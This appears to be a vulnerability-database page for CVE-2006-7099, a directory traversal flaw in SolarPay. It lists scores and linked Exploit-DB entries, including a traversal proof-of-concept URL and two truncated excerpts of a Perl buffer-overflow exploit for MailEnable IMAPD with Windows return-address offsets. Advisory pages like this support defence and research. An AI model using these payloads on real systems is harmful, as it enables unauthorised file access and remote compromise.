CVE-2006-7099
published 2007-03-03CVE-2006-7099: Directory traversal vulnerability in index.php in SolarPay allows remote attackers to read certain files via a .. (dot dot) in the read parameter. NOTE: the…
PriorityP423medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.40%
82.0th percentile
Directory traversal vulnerability in index.php in SolarPay allows remote attackers to read certain files via a .. (dot dot) in the read parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarpay | solarpay | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SolarPay - 'index.php' Local File Inclusion
exploitdb·2007-02-26
CVE-2006-7099 SolarPay - 'index.php' Local File Inclusion
SolarPay - 'index.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/22722/info
SolarPay is prone to a local file-include vulnerability because the utility fails to properly sanitize user-supplied input.
Successfully exploiting this issue allows attackers to gain access to files located in directories they do not have permissions to access. Information that attackers harvest may aid them in further attacks.
http://www.example.com/index.php?read=../admin/a_searchu.php
Exploit-DB
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else
Exploit-DB
MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
MailEnable IMAPD Enterprise 2.32 jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $STAR
No writeups or analysis indexed.
2007-03-03
Published